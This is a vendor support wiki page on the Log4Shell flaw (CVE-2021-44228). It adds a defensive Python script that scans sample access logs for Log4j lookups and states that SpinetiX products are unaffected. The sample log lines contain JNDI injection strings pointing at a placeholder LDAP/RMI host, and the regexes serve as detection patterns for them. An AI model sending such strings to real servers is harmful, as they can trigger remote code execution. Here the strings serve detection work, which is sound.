Apache Log4j vulnerability
From SpinetiX Support Wiki
This article is related to Security.
The Log4j flaw (now also known as "Log4Shell") is a zero-day vulnerability that first came to light on 9 December 2021, with warnings that it can allow unauthenticated remote code execution and access to servers.
The official description of CVE-2021-44228 summarises the flaw: Apache Log4j2 ≤ 2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. [...]
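The mechanism described above (lookup substitution on attacker-controlled log message text) is also what makes the flaw detectable in logs: the triggering input has to reach a Log4j logger, so web server access logs and application logs usually retain the lookup string. The following added example, which is not part of this wiki page or of any SpinetiX product, scans constructed sample access-log lines and classifies each one. The log lines, host names (example.invalid) and the two-level verdict scheme are assumptions made for the example.

```python
import re

# Constructed sample access-log lines for the demonstration; none of them
# come from a real system. Lines 2 and 3 carry a JNDI lookup in the
# User-Agent and query string, line 4 carries a harmless-looking lookup.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:08:15:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:08:15:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:08:15:09 +0000] "GET /?x=${JNDI:rmi://example.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:08:16:00 +0000] "GET /api HTTP/1.1" 200 88 "-" "${env:HOSTNAME}"',
]

# High-confidence indicator: a Log4j lookup that names the jndi resolver
# directly. Log4j matches lookup names case-insensitively, so we do too.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Lower-confidence indicator: any "${...}" lookup expression at all. Normal
# client input rarely contains Log4j lookup syntax, so it is worth a look,
# but it is not by itself proof of a JNDI attempt.
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")


def classify_line(line):
    """Return 'jndi-lookup', 'lookup' or 'clean' for one log line."""
    if JNDI_LOOKUP.search(line):
        return "jndi-lookup"
    if ANY_LOOKUP.search(line):
        return "lookup"
    return "clean"


def scan(lines):
    """Return (line_number, verdict, line) for every non-clean line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        verdict = classify_line(line)
        if verdict != "clean":
            findings.append((number, verdict, line))
    return findings


if __name__ == "__main__":
    for number, verdict, line in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: {verdict}: {line}")
```

Two caveats for anyone using this as a starting point: the literal `${jndi:` form is the most common one but Log4j evaluates nested lookups before the outer one, so a matcher on the raw text will miss rewritten variants, and any hit in logs only shows that an attempt reached a logger, not that a vulnerable Log4j 2.x build processed it. The actual fix remains upgrading Log4j 2.x (or removing the JNDI lookup class) on every system that does ship it.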
Impact on SpinetiX products
SpinetiX has researched the exposure of SpinetiX firmware and software to the critical Log4j2 vulnerability CVE-2021-44228, a 0-day discovery affecting numerous systems worldwide, and we have concluded that none of them is affected. The log4j library is not used in any SpinetiX firmware or software, be it DSOS, Elementi, ARYA, Cockpit, or the other cloud services.
- The Amazon Web Services (AWS) infrastructure used by SpinetiX does use Log4j2 in several of its services. AWS has rapidly addressed these vulnerabilities, and they are no longer impacted. All the details and timeline from AWS are available on this Update for Apache Log4j2 Issue (CVE-2021-44228) security bulletin.
- A related Apache log4cxx library, derived from Apache log4j 1.x, is used on DSOS and Elementi, but it does not include any support for the affected modules of log4j 2.x. Furthermore, DSOS only allows a very limited subset of log4cxx functionality to be configured, and only plain file appenders can be used. Elementi does not expose any means of changing its logging configuration.